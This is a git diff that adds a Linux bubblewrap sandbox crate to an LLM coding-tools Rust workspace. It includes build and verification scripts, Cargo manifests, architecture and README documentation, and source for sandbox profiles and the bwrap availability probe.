+ $docArgs = @("--workspace", "--document-private-items", "--no-deps", "--quiet", "--exclude", "llm-coding-tools-bubblewrap") + $originalRustdocFlags = $env:RUSTDOCFLAGS + $env:RUSTDOCFLAGS = "-D warnings" + try { + Invoke-LoggedCommand "cargo" (@("doc") + $docArgs) + } finally { + $env:RUSTDOCFLAGS = $originalRustdocFlags + } + + Write-Host "Formatting..." + Invoke-LoggedCommand "cargo" @("fmt", "--all", "--check", "--quiet") + + Write-Host "Linux-only feature coverage..." + if ($onLinux) { + Write-Host "Building (linux async features)..." + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-bubblewrap", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-core", "--features", "linux-bubblewrap", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-serdesai", "--features", "linux-bubblewrap", "--quiet") + + Write-Host "Testing (linux async features)..." + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-bubblewrap", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--features", "linux-bubblewrap", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-serdesai", "--features", "linux-bubblewrap", "--quiet") + + Write-Host "Clippy (linux async features)..." + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-bubblewrap", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-core", "--features", "linux-bubblewrap", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-serdesai", "--features", "linux-bubblewrap", "--quiet", "--", "-D", "warnings") -Write-Host "Formatting..." -Invoke-LoggedCommand "cargo" @("fmt", "--all", "--check", "--quiet") + Write-Host "Building (linux blocking features)..." 
+ Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-bubblewrap", "--no-default-features", "--features", "blocking", "--quiet") + Invoke-LoggedCommand "cargo" @("build", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking,linux-bubblewrap", "--quiet") -Write-Host "Publish dry-run..." -Invoke-LoggedCommand "cargo" @("publish", "--dry-run", "--allow-dirty", "-p", "llm-coding-tools-core", "--quiet") -Invoke-LoggedCommand "cargo" @("publish", "--dry-run", "--allow-dirty", "-p", "llm-coding-tools-agents", "--quiet") -Invoke-LoggedCommand "cargo" @("publish", "--dry-run", "--allow-dirty", "-p", "llm-coding-tools-serdesai", "--quiet") -Invoke-LoggedCommand "cargo" @("publish", "--dry-run", "--allow-dirty", "-p", "llm-coding-tools-models-dev", "--quiet") + Write-Host "Testing (linux blocking features)..." + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-bubblewrap", "--no-default-features", "--features", "blocking", "--quiet") + Invoke-LoggedCommand "cargo" @("test", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking,linux-bubblewrap", "--quiet") + + Write-Host "Clippy (linux blocking features)..." + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-bubblewrap", "--no-default-features", "--features", "blocking", "--quiet", "--", "-D", "warnings") + Invoke-LoggedCommand "cargo" @("clippy", "-p", "llm-coding-tools-core", "--no-default-features", "--features", "blocking,linux-bubblewrap", "--quiet", "--", "-D", "warnings") + + Write-Host "Docs (linux-only package)..." + $linuxRustdocFlags = $env:RUSTDOCFLAGS + $env:RUSTDOCFLAGS = "-D warnings" + try { + Invoke-LoggedCommand "cargo" @("doc", "-p", "llm-coding-tools-bubblewrap", "--document-private-items", "--no-deps", "--quiet") + } finally { + $env:RUSTDOCFLAGS = $linuxRustdocFlags + } + } else { + Write-Host " (skipped - not Linux)" + } -Write-Host "All checks passed!" + Write-Host "All checks passed!" 
} finally { Set-Location $originalDir diff --git a/src/.cargo/verify.sh b/src/.cargo/verify.sh index 36ff4728..55fafdb8 100755 --- a/src/.cargo/verify.sh +++ b/src/.cargo/verify.sh @@ -5,6 +5,8 @@ # # Note: llm-coding-tools-serdesai is async-only. # Blocking mode is validated for core and models-dev. +# llm-coding-tools-bubblewrap is Linux-only; all bubblewrap steps +# are skipped on non-Linux platforms. set -e @@ -20,38 +22,82 @@ cd "$PROJECT_ROOT" trap 'cd "$ORIGINAL_DIR"' EXIT -echo "Building..." +IS_LINUX=false +if [ "$(uname -s)" = "Linux" ]; then + IS_LINUX=true +fi + +echo "Building (async features)..." run_cmd cargo build -p llm-coding-tools-core --quiet run_cmd cargo build -p llm-coding-tools-agents --quiet run_cmd cargo build -p llm-coding-tools-serdesai --quiet run_cmd cargo build -p llm-coding-tools-models-dev --quiet -echo "Testing..." +echo "Testing (async features)..." run_cmd cargo test -p llm-coding-tools-core --quiet run_cmd cargo test -p llm-coding-tools-agents --quiet run_cmd cargo test -p llm-coding-tools-serdesai --quiet run_cmd cargo test -p llm-coding-tools-models-dev --quiet -echo "Clippy..." +echo "Clippy (async features)..." run_cmd cargo clippy -p llm-coding-tools-core --quiet -- -D warnings run_cmd cargo clippy -p llm-coding-tools-agents --quiet -- -D warnings run_cmd cargo clippy -p llm-coding-tools-serdesai --quiet -- -D warnings run_cmd cargo clippy -p llm-coding-tools-models-dev --quiet -- -D warnings -echo "Testing blocking feature..." +echo "Building (blocking feature)..." +run_cmd cargo build -p llm-coding-tools-core --no-default-features --features blocking --quiet +run_cmd cargo build -p llm-coding-tools-models-dev --no-default-features --features blocking --quiet + +echo "Testing (blocking feature)..." 
run_cmd cargo test -p llm-coding-tools-core --no-default-features --features blocking --quiet run_cmd cargo test -p llm-coding-tools-models-dev --no-default-features --features blocking --quiet +echo "Clippy (blocking feature)..." +run_cmd cargo clippy -p llm-coding-tools-core --no-default-features --features blocking --quiet -- -D warnings +run_cmd cargo clippy -p llm-coding-tools-models-dev --no-default-features --features blocking --quiet -- -D warnings + echo "Docs..." -run_cmd env RUSTDOCFLAGS="-D warnings" cargo doc --workspace --document-private-items --no-deps --quiet +DOC_ARGS=(--workspace --document-private-items --no-deps --quiet --exclude llm-coding-tools-bubblewrap) +run_cmd env RUSTDOCFLAGS="-D warnings" cargo doc "${DOC_ARGS[@]}" echo "Formatting..." run_cmd cargo fmt --all --check --quiet -echo "Publish dry-run..." -run_cmd cargo publish --dry-run --allow-dirty -p llm-coding-tools-core --quiet -run_cmd cargo publish --dry-run --allow-dirty -p llm-coding-tools-agents --quiet -run_cmd cargo publish --dry-run --allow-dirty -p llm-coding-tools-serdesai --quiet -run_cmd cargo publish --dry-run --allow-dirty -p llm-coding-tools-models-dev --quiet +echo "Linux-only feature coverage..." +if [ "$IS_LINUX" = true ]; then + echo "Building (linux async features)..." + run_cmd cargo build -p llm-coding-tools-bubblewrap --quiet + run_cmd cargo build -p llm-coding-tools-core --features linux-bubblewrap --quiet + run_cmd cargo build -p llm-coding-tools-serdesai --features linux-bubblewrap --quiet + + echo "Testing (linux async features)..." + run_cmd cargo test -p llm-coding-tools-bubblewrap --quiet + run_cmd cargo test -p llm-coding-tools-core --features linux-bubblewrap --quiet + run_cmd cargo test -p llm-coding-tools-serdesai --features linux-bubblewrap --quiet + + echo "Clippy (linux async features)..." 
+ run_cmd cargo clippy -p llm-coding-tools-bubblewrap --quiet -- -D warnings + run_cmd cargo clippy -p llm-coding-tools-core --features linux-bubblewrap --quiet -- -D warnings + run_cmd cargo clippy -p llm-coding-tools-serdesai --features linux-bubblewrap --quiet -- -D warnings + + echo "Building (linux blocking features)..." + run_cmd cargo build -p llm-coding-tools-bubblewrap --no-default-features --features blocking --quiet + run_cmd cargo build -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap --quiet + + echo "Testing (linux blocking features)..." + run_cmd cargo test -p llm-coding-tools-bubblewrap --no-default-features --features blocking --quiet + run_cmd cargo test -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap --quiet + + echo "Clippy (linux blocking features)..." + run_cmd cargo clippy -p llm-coding-tools-bubblewrap --no-default-features --features blocking --quiet -- -D warnings + run_cmd cargo clippy -p llm-coding-tools-core --no-default-features --features blocking,linux-bubblewrap --quiet -- -D warnings + + echo "Docs (linux-only package)..." + run_cmd env RUSTDOCFLAGS="-D warnings" cargo doc -p llm-coding-tools-bubblewrap --document-private-items --no-deps --quiet + +else + echo " (skipped - not Linux)" +fi echo "All checks passed!" 
diff --git a/src/Cargo.lock b/src/Cargo.lock index 1b4625ca..4a876d55 100644 --- a/src/Cargo.lock +++ b/src/Cargo.lock @@ -1993,6 +1993,18 @@ dependencies = [ "thiserror 2.0.18", ] +[[package]] +name = "llm-coding-tools-bubblewrap" +version = "0.1.0" +dependencies = [ + "parking_lot", + "process-wrap", + "serial_test", + "tempfile", + "thiserror 2.0.18", + "tokio", +] + [[package]] name = "llm-coding-tools-core" version = "0.2.0" @@ -2011,6 +2023,7 @@ dependencies = [ "ignore", "indoc", "lite-strtab", + "llm-coding-tools-bubblewrap", "maybe-async", "memchr", "parking_lot", @@ -2019,6 +2032,7 @@ dependencies = [ "schemars", "serde", "serde_json", + "serial_test", "temp-env", "tempfile", "thiserror 2.0.18", @@ -2057,6 +2071,7 @@ dependencies = [ "futures", "indexmap", "llm-coding-tools-agents", + "llm-coding-tools-bubblewrap", "llm-coding-tools-core", "llm-coding-tools-models-dev", "reqwest 0.13.1", @@ -2065,6 +2080,7 @@ dependencies = [ "serdes-ai", "serdes-ai-models", "serdes-ai-streaming", + "serial_test", "temp-env", "tempfile", "thiserror 2.0.18", diff --git a/src/Cargo.toml b/src/Cargo.toml index ff11d282..479e530f 100644 --- a/src/Cargo.toml +++ b/src/Cargo.toml @@ -1,7 +1,13 @@ [workspace] resolver = "2" -members = ["llm-coding-tools-core", "llm-coding-tools-serdesai", "llm-coding-tools-agents", "llm-coding-tools-models-dev"] +members = [ + "llm-coding-tools-core", + "llm-coding-tools-serdesai", + "llm-coding-tools-agents", + "llm-coding-tools-models-dev", + "llm-coding-tools-bubblewrap", +] # Profile Build [profile.profile] diff --git a/src/llm-coding-tools-bubblewrap/ARCHITECTURE.md b/src/llm-coding-tools-bubblewrap/ARCHITECTURE.md new file mode 100644 index 00000000..c9b98da5 --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/ARCHITECTURE.md @@ -0,0 +1,156 @@ +# Architecture: llm-coding-tools-bubblewrap + +Linux-only library that builds bubblewrap sandbox profiles, probes host +capabilities, and produces wrapped command lines. 
+ +For the security model, see [SANDBOX-PROFILES.md](../../SANDBOX-PROFILES.md). + +## File Map + +``` +llm-coding-tools-bubblewrap +├── lib.rs crate root, re-exports, Linux-only gate +├── error.rs LinuxBwrapError +├── probe.rs bwrap detection & shell resolution (cached) +├── path_util.rs normalize_path helper +├── profile/ +│ ├── mod.rs module root; re-exports public API surface +│ ├── types.rs Profile, Preset, TmpBacking, Availability, etc. +│ ├── builder.rs Builder + build() + static arg precomputation +│ ├── presets.rs public_bot() & trusted_maintenance() constructors +│ ├── validation.rs path/symlink/env/tmp validators +│ └── layout.rs SandboxLayout — "is this host path visible inside?" +├── wrap/ +│ ├── mod.rs module root; cfg(feature) gates, re-exports +│ ├── command.rs wrap_command → LinuxBwrapWrappedCommand +│ ├── tokio.rs async CommandWrap (feature "tokio") +│ └── blocking.rs sync CommandWrap (feature "blocking") +└── test_helpers.rs fake bwrap/shell fixtures (cfg(test)) +``` + +## Building a Profile + +``` + Builder::public_bot() Builder::trusted_maintenance() Builder::new() + or any with_*() chain + │ + │ .build() + ▼ + ┌─────────────────────────────────────────────────────────┐ + │ 0. ensure cache root subdirs (when cache root mounted) │ + │ 1. validate paths, env, symlinks, tmp, creds, │ + │ mounts, tmpfs overlays │ + │ 2. resolve bwrap binary (probe.rs, cached) │ + │ 3. resolve visible shell (builder.rs + layout.rs) │ + │ 4. 
precompute static bwrap argv │ + └───────────────────────────┬─────────────────────────────┘ + │ + ▼ + ┌──────────┐ + │ Profile │ frozen, Clone, thread-safe + └──────────┘ +``` + +## Using a Profile + +Pass the `Profile` to `wrap_command` directly, or use an adapter: + +``` + ┌──────────┐ + │ Profile │ + └────┬─────┘ + │ + ┌──────────┼──────────┐ + ▼ │ ▼ + tokio:: │ blocking:: + build_command_wrap │ build_command_wrap + (async CommandWrap)│ (sync CommandWrap) + │ │ │ + └──────────┼──────────┘ + ▼ + wrap_command() → LinuxBwrapWrappedCommand (argv iterator) +``` + +## What build() Does + +``` + ensure cache dirs ──► validate ──► find bwrap ──► find shell ──► build static args + │ │ │ │ │ + validation.rs validation.rs probe.rs builder.rs + builder.rs + (when cache + builder.rs (cached) layout.rs (one-time + root mounted) (creds) (visibility) precompute) +``` + +Result: a `Profile` with `static_args: Arc<[OsString]>` containing the full +bwrap prefix (flags, mounts, env). `wrap_command` only appends `--chdir +<workdir> -- <shell> -c <command>`. + +## Two Presets at a Glance + +| | PublicBot | TrustedMaintenance | +| ------------------ | -------------------------- | ------------------------------ | +| Network | off (`--unshare-net`) | on | +| Host filesystem | selective read-only mounts | full `/` read-only | +| Writable areas | workspace, home, `/tmp` | workspace, home, cache, `/tmp` | +| `/etc/shadow` | hidden (not mounted) | hidden (file overlay) | +| Cache root | not mounted | bind-mounted | +| Env | cleared, sanitized PATH | cleared, PATH + XDG + TMPDIR | +| Safe for untrusted | yes | no | + +## Path Visibility (layout.rs) + +When `wrap_command` needs to translate a host working directory to a sandbox +path, `SandboxLayout::classify` walks the mount tree: + +``` +host_path + ├── under workspace? → remap workspace → workspace_dest + ├── under synthetic_home? → remap home → home_dest + ├── under BindHost tmp? → remap to /tmp + ├── under cache_root?
→ same path (if mounted) + ├── in ro/rw mounts? → same path + ├── ro-host-rootfs? → same path (unless tmpfs overlay hides it) + └── else → hidden (error) +``` + +Same logic is used at `build()` time to find a shell that's actually visible +inside the sandbox. + +## Probe Cache (probe.rs) + +`probe_backend_uncached()` spawns `bwrap --version` then a minimal sandbox to verify +namespace support. `probe_backend()` caches results in a `OnceLock<RwLock<…>>` +keyed on `$PATH` — a changed PATH invalidates the cache. + +Shell search order: `bash` on PATH → `sh` on PATH → hardcoded candidates +(Nix, FHS) → deduplicated by resolved path. + +## Error Model + +``` +LinuxBwrapError +├── InvalidPath(String) bad path, bad env name/value, bad symlink, +│ bad credential mount, bad tmp backing, +│ cache subdir I/O failure, invisible workdir +└── Execution(String) bwrap missing, bwrap broken, no visible shell, unavailable +``` + +All validation errors surface at `build()`. `wrap_command` can only fail on a bad +per-call working directory. + +## Feature Flags + +``` +(no features) → wrap_command only (no process-wrap dependency) +tokio → wrap::tokio::build_command_wrap (process-wrap tokio1, process-group; enabled by default) +blocking → wrap::blocking::build_command_wrap (process-wrap std, process-group) +``` + +Both execution adapters set stdin=null, stdout/stderr=piped, and wrap with +`ProcessGroup::leader()` for clean signal handling. + +## Testing + +Fake `bwrap` and `bash` scripts in temp dirs with managed `$PATH`. Tests +that touch `$PATH` run `#[serial]` to avoid cache contamination. No real +bubblewrap installation needed.
diff --git a/src/llm-coding-tools-bubblewrap/Cargo.toml b/src/llm-coding-tools-bubblewrap/Cargo.toml new file mode 100644 index 00000000..f07e549b --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/Cargo.toml @@ -0,0 +1,24 @@ +[package] +name = "llm-coding-tools-bubblewrap" +version = "0.1.0" +edition = "2021" +description = "Linux bubblewrap sandbox profiles, probing, and execution for llm-coding-tools" +repository = "https://github.com/Sewer56/llm-coding-tools" +license = "Apache-2.0" +include = ["src/**/*", "README.md"] +readme = "README.md" + +[features] +default = ["tokio"] +tokio = ["dep:process-wrap", "process-wrap/tokio1", "process-wrap/process-group"] +blocking = ["dep:process-wrap", "process-wrap/std", "process-wrap/process-group"] + +[dependencies] +parking_lot = "0.12" +thiserror = "2.0" +process-wrap = { version = "9", default-features = false, optional = true } + +[dev-dependencies] +serial_test = "3" +tempfile = "3.27" +tokio = { version = "1.50", features = ["rt", "macros"] } diff --git a/src/llm-coding-tools-bubblewrap/README.md b/src/llm-coding-tools-bubblewrap/README.md new file mode 100644 index 00000000..38105d0d --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/README.md @@ -0,0 +1,158 @@ +# llm-coding-tools-bubblewrap + +Builds bubblewrap profiles, availability checks, and wrapped commands for `llm-coding-tools`. + +**Linux only.** + +## Main Types + +- [`Builder`] - Builds a bubblewrap profile. +- [`Profile`] - A validated bubblewrap profile ready for reuse. +- [`Availability::detect`] - Checks whether `bwrap` can run. +- [`wrap::wrap_command`] - Builds a `bwrap` command from a profile. +- `wrap::tokio::build_command_wrap` - Builds the async wrapped command. +- `wrap::blocking::build_command_wrap` - Builds the blocking wrapped command. + +## Feature Flags + +- `tokio` (enabled by default): enables `wrap::tokio::build_command_wrap`. +- `blocking`: enables `wrap::blocking::build_command_wrap`.
+ +## Usage + +### Building a Profile + +```rust,no_run +use llm_coding_tools_bubblewrap::{ + Preset, Builder, TmpBacking, +}; +use std::path::Path; + +fn main() -> Result<(), llm_coding_tools_bubblewrap::LinuxBwrapError> { +let profile = Builder::public_bot( + Path::new("/host/workspace"), // workspace: host directory mounted into the sandbox + Path::new("/tmp/sandbox-home"), // synthetic_home: host dir mounted as $HOME (/home/sandbox) inside the sandbox + Path::new("/tmp/sandbox-cache"), // cache_root: host cache root used for sandbox cache/state dirs + Some(TmpBacking::Tmpfs), // tmp_backing: how sandbox /tmp is backed (RAM or host dir) +) +.build()?; + +assert_eq!(profile.preset(), Some(Preset::PublicBot)); + Ok(()) +} +``` + +### Detecting Availability + +```rust,no_run +use llm_coding_tools_bubblewrap::Availability; + +match Availability::detect() { + Availability::Available => { + println!("sandbox is ready"); + } + Availability::Unavailable { reason } => { + eprintln!("sandbox unavailable: {reason}"); + } + Availability::Unknown => { + println!("availability not checked"); + } +} +``` + +### Wrapping a Command + +```rust,no_run +use llm_coding_tools_bubblewrap::{ + wrap, Preset, Builder, TmpBacking, +}; +use std::path::Path; + +fn main() -> Result<(), llm_coding_tools_bubblewrap::LinuxBwrapError> { +let profile = Builder::public_bot( + Path::new("/host/workspace"), // workspace: host directory mounted into the sandbox + Path::new("/tmp/sandbox-home"), // synthetic_home: host dir mounted as $HOME (/home/sandbox) inside the sandbox + Path::new("/tmp/sandbox-cache"), // cache_root: host cache root used for sandbox cache/state dirs + Some(TmpBacking::Tmpfs), // tmp_backing: how sandbox /tmp is backed (RAM or host dir) +) +.build()?; + +let wrapped = wrap::wrap_command( + &profile, // profile: validated profile from Builder::build() + "echo hello", // command: shell command string to execute + None, // workdir: host working directory (None = use workspace) 
+).unwrap(); +assert!(wrapped.program().ends_with("bwrap")); + Ok(()) +} +``` + +### Running with Tokio + +```text +// wrap::tokio::build_command_wrap(&profile, command, workdir) +// profile: validated Profile +// command: shell command string to execute +// workdir: host working directory (None = use workspace) +``` +See `wrap::tokio::build_command_wrap` (requires the `tokio` feature). + +### Running with Blocking + +```text +// wrap::blocking::build_command_wrap(&profile, command, workdir) +// profile: validated Profile +// command: shell command string to execute +// workdir: host working directory (None = use workspace) +``` +See `wrap::blocking::build_command_wrap` (requires the `blocking` feature). + +## Presets + +- [`Preset::PublicBot`] - Safer defaults for untrusted input. Uses a + synthetic home, a cleaned `PATH`, read-only system mounts, optional RAM-backed + `/tmp`, and no network. +- [`Preset::TrustedMaintenance`] - Broader defaults for trusted jobs. + Uses a read-only host root, a cleaned `PATH`, writable overlays, host-backed + `/tmp`, and keeps network on. + +`TrustedMaintenance` is only for trusted jobs. A command can send out any data +it can read. + +Preset helpers return a builder, so you can still change paths, mounts, and env +vars before calling `.build()`. That build step validates profile-owned inputs +and precomputes the reusable `bwrap` argv prefix. + +[`TmpBacking::Tmpfs`] keeps sandbox `/tmp` in memory. Use +[`TmpBacking::BindHost`] to mount a host directory at `/tmp`. + +[`wrap::wrap_command`] tries a visible host `bash` first and falls back to `sh`. +On Nix systems that is often under `/nix/store/...`. On FHS systems it is often +under `/usr/bin` or `/bin`. + +[`Preset::PublicBot`] filters out user-home, temp, wrapper, and +per-user profile directories from the inherited `PATH`. +[`Preset::TrustedMaintenance`] keeps more host `PATH` entries, but +still drops entries under directories hidden by the profile.
+ +For more details on sandbox profiles and trade-offs, see +[SANDBOX-PROFILES.md](https://github.com/Sewer56/llm-coding-tools/blob/main/SANDBOX-PROFILES.md). + +## Builder Lists + +Setters like `with_read_only_mounts` replace the whole list. They do not append. +That keeps the builder state easy to read. + +## Errors + +- Missing `bwrap` is reported clearly. +- Environments that cannot create a sandbox are reported clearly. +- Invalid profile-owned paths and invalid credential mounts are rejected at build time. +- Invalid per-command working directories are rejected before spawn. + +For the internal architecture and module layout, see [ARCHITECTURE.md](ARCHITECTURE.md). + +[`Availability::detect`]: crate::Availability::detect +[`Profile`]: crate::Profile +[`Builder`]: crate::Builder +[`wrap::wrap_command`]: crate::wrap::wrap_command diff --git a/src/llm-coding-tools-bubblewrap/src/error.rs b/src/llm-coding-tools-bubblewrap/src/error.rs new file mode 100644 index 00000000..0c10936a --- /dev/null +++ b/src/llm-coding-tools-bubblewrap/src/error.rs @@ -0,0 +1,16 @@ +//! Error types for bubblewrap sandbox setup and execution. + +use thiserror::Error; + +/// Errors returned while validating or planning a bubblewrap command line. +#[derive(Debug, Error)] +pub enum LinuxBwrapError { + /// A caller-provided path (working directory, mount source or destination, + /// or tmp backing directory) is invalid or unreachable inside the sandbox. + #[error("{0}")] + InvalidPath(String), + /// The `bwrap` binary could not be found on `PATH` or no usable host shell + /// is visible inside the sandbox. 
+    #[error("{0}")]
+    Execution(String),
+}
diff --git a/src/llm-coding-tools-bubblewrap/src/lib.rs b/src/llm-coding-tools-bubblewrap/src/lib.rs
new file mode 100644
index 00000000..5d11ccae
--- /dev/null
+++ b/src/llm-coding-tools-bubblewrap/src/lib.rs
@@ -0,0 +1,19 @@
+#![doc = include_str!(concat!("../", env!("CARGO_PKG_README")))]
+
+#[cfg(not(target_os = "linux"))]
+compile_error!("llm-coding-tools-bubblewrap is only supported on Linux");
+
+mod error;
+mod path_util;
+mod probe;
+pub mod profile;
+pub mod wrap;
+
+#[cfg(test)]
+mod test_helpers;
+
+pub use error::LinuxBwrapError;
+pub use profile::{
+    Availability, Builder, EnvVar, FileMount, NetworkPolicy, Preset, Profile, Symlink, TmpBacking,
+};
+pub use wrap::LinuxBwrapWrappedCommand;
diff --git a/src/llm-coding-tools-bubblewrap/src/path_util.rs b/src/llm-coding-tools-bubblewrap/src/path_util.rs
new file mode 100644
index 00000000..39a90953
--- /dev/null
+++ b/src/llm-coding-tools-bubblewrap/src/path_util.rs
@@ -0,0 +1,15 @@
+//! Crate-private path utilities for preparing filesystem paths before sandbox use.
+//!
+//! Callers in [`probe`](crate::probe) and [`profile`](crate::profile) use these
+//! helpers to normalize paths so that comparisons and bind-mount targets are
+//! consistent regardless of symlinks or relative components.
+
+use std::fs;
+use std::path::Path;
+
+/// Canonicalizes `path` when possible and otherwise preserves the original.
+pub(crate) fn normalize_path(path: &Path) -> Box<Path> {
+    fs::canonicalize(path)
+        .unwrap_or_else(|_| path.to_path_buf())
+        .into_boxed_path()
+}
diff --git a/src/llm-coding-tools-bubblewrap/src/probe.rs b/src/llm-coding-tools-bubblewrap/src/probe.rs
new file mode 100644
index 00000000..60f0af4d
--- /dev/null
+++ b/src/llm-coding-tools-bubblewrap/src/probe.rs
@@ -0,0 +1,404 @@
+//! Checks whether `bwrap` can run.
+//!
+//! Most callers should use [`crate::profile::Availability::detect`].
+ +use crate::path_util::normalize_path; +use crate::{Availability, LinuxBwrapError, Preset}; +use parking_lot::RwLock; +use std::env; +use std::ffi::OsString; +use std::path::{Path, PathBuf}; +use std::process::{Command, Output, Stdio}; +use std::sync::Arc; +use std::sync::OnceLock; + +/// A no-op shell command used as the probe payload. +const PROBE_COMMAND: &str = ":"; +/// Sentinel argument appended to the probe command to distinguish its logs. +pub(crate) const PROBE_ARG0: &str = "__llm_coding_tools_bwrap_probe__"; +/// Absolute paths checked when `PATH` lookups for `bash`/`sh` yield nothing. +const SHELL_CANDIDATES: &[&str] = &[ + "/run/current-system/sw/bin/bash", + "/nix/var/nix/profiles/default/bin/bash", + "/usr/bin/bash", + "/bin/bash", + "/run/current-system/sw/bin/sh", + "/nix/var/nix/profiles/default/bin/sh", + "/usr/bin/sh", + "/bin/sh", +]; + +/// Outcome of probing the host for a working `bwrap` binary. +#[derive(Clone, Debug)] +enum LinuxBwrapBackend { + /// `bwrap` was found and successfully created a sandbox. + Available { bwrap: Arc }, + /// No `bwrap` binary exists on `PATH`. + MissingBinary { reason: Box }, + /// `bwrap` exists but the environment cannot run sandboxes (e.g. missing namespaces). + Unusable { reason: Box }, +} + +/// Returns whether `bwrap` is usable on this host. +/// +/// Results are cached per `PATH` value within the process lifetime. +pub(crate) fn probe_availability() -> Availability { + match probe_backend() { + LinuxBwrapBackend::Available { .. } => Availability::Available, + LinuxBwrapBackend::MissingBinary { reason } | LinuxBwrapBackend::Unusable { reason } => { + Availability::Unavailable { reason } + } + } +} + +/// Returns the path to `bwrap` or an error explaining why it cannot be used. +/// +/// If `availability` already indicates unavailability, returns early without +/// probing again. Otherwise re-checks the host and returns an [`Arc`] on +/// success or a [`LinuxBwrapError::Execution`] on failure. 
+pub(crate) fn resolve_backend_or_error_for( + preset: Option, + availability: &Availability, +) -> Result, LinuxBwrapError> { + if let Some(reason) = availability.reason() { + return Err(LinuxBwrapError::Execution(format!( + "linux sandbox profile {} is unavailable: {}", + profile_name(preset), + reason, + ))); + } + + match probe_backend() { + LinuxBwrapBackend::Available { bwrap } => Ok(bwrap), + LinuxBwrapBackend::MissingBinary { reason } => Err(LinuxBwrapError::Execution(format!( + "linux sandbox profile {} requires bubblewrap (`bwrap`), but no usable binary was found: {}", + profile_name(preset), + reason, + ))), + LinuxBwrapBackend::Unusable { reason } => Err(LinuxBwrapError::Execution(format!( + "linux sandbox profile {} requires bubblewrap (`bwrap`), but the current environment cannot create a sandbox: {}", + profile_name(preset), + reason, + ))), + } +} + +fn profile_name(preset: Option) -> &'static str { + match preset { + Some(Preset::PublicBot) => "PublicBot", + Some(Preset::TrustedMaintenance) => "TrustedMaintenance", + None => "Custom", + } +} + +/// Searches `PATH` directories for a file named `name` and returns the first match. +pub(crate) fn find_binary_on_path(name: &str) -> Option> { + let path = env::var_os("PATH")?; + for dir in env::split_paths(&path) { + if !dir.is_absolute() || dir.as_os_str().is_empty() { + continue; + } + let candidate = dir.join(name); + if candidate.is_file() { + return Some(candidate.into_boxed_path()); + } + } + None +} + +/// Returns the first shell binary for which `classify` returns [`Some`], +/// checking `PATH` first then the hardcoded [`SHELL_CANDIDATES`]. +/// +/// On success the host path and the classifier's return value are yielded +/// together so the caller need not re-classify. 
+pub(crate) fn first_shell_candidate_with(mut classify: F) -> Option<(Box, R)> +where + F: FnMut(&Path) -> Option, +{ + for name in ["bash", "sh"] { + if let Some(path) = find_binary_on_path(name) { + let path = normalize_path(path.as_ref()); + if let Some(r) = classify(path.as_ref()) { + return Some((path, r)); + } + } + } + for candidate in SHELL_CANDIDATES { + let path = PathBuf::from(candidate); + if path.is_file() { + let path = normalize_path(&path); + if let Some(r) = classify(path.as_ref()) { + return Some((path, r)); + } + } + } + None +} + +/// Returns any available host shell (`bash` preferred, then `sh`). +pub(crate) fn resolve_host_shell() -> Option> { + first_shell_candidate_with(|_| Some(())).map(|(path, _)| path) +} + +fn probe_backend() -> LinuxBwrapBackend { + // Cache keyed on PATH: a changed PATH invalidates the result. + #[allow(clippy::type_complexity)] + static CACHE: OnceLock, LinuxBwrapBackend)>>> = OnceLock::new(); + + let path = env::var_os("PATH"); + let cache = CACHE.get_or_init(|| RwLock::new(None)); + + { + let cache = cache.read(); + if let Some((cached_path, cached_backend)) = cache.as_ref() { + if cached_path == &path { + return cached_backend.clone(); + } + } + } + + let backend = probe_backend_uncached(); + *cache.write() = Some((path, backend.clone())); + backend +} + +/// Checks `bwrap` without using the cache. +/// +/// The probe binds the host root read-only and runs a tiny shell command. That +/// checks both namespace support and shell visibility on FHS and Nix systems. 
+fn probe_backend_uncached() -> LinuxBwrapBackend {
+    let Some(bwrap) = find_binary_on_path("bwrap") else {
+        return LinuxBwrapBackend::MissingBinary {
+            reason: Box::from("`bwrap` was not found on PATH"),
+        };
+    };
+
+    // Step 1: the binary must at least start and answer `--version`.
+    let version = Command::new(bwrap.as_os_str())
+        .arg("--version")
+        .stdin(Stdio::null())
+        .stdout(Stdio::null())
+        .stderr(Stdio::piped())
+        .output();
+    let version = match version {
+        Ok(version) => version,
+        // Keep the OS error (e.g. permission denied) so callers can see why
+        // the file on PATH could not be executed.
+        Err(error) => {
+            return LinuxBwrapBackend::MissingBinary {
+                reason: format!("failed to execute {}: {error}", bwrap.display())
+                    .into_boxed_str(),
+            };
+        }
+    };
+    if !version.status.success() {
+        return LinuxBwrapBackend::Unusable {
+            reason: probe_failure_reason(&version, "`bwrap --version` failed"),
+        };
+    }
+
+    // Step 2: the sandbox probe needs a host shell to run inside it.
+    let Some(shell) = resolve_host_shell() else {
+        return LinuxBwrapBackend::Unusable {
+            reason: Box::from("no usable host shell (`bash` or `sh`) was found"),
+        };
+    };
+
+    // Verify that bwrap can actually create namespaces by running a minimal
+    // sandbox (host root read-only, no-op command). Finding the binary on PATH
+    // is not enough; the process may lack user-namespace capabilities.
+    // PROBE_ARG0 appears as $0 so the probe is identifiable in logs/audit.
+    let probe = Command::new(bwrap.as_os_str())
+        .args([
+            "--die-with-parent",
+            "--new-session",
+            "--proc",
+            "/proc",
+            "--dev",
+            "/dev",
+            "--ro-bind",
+            "/",
+            "/",
+            "--",
+        ])
+        .arg(shell.as_os_str())
+        .arg("-c")
+        .arg(PROBE_COMMAND)
+        .arg(PROBE_ARG0)
+        .stdin(Stdio::null())
+        .stdout(Stdio::null())
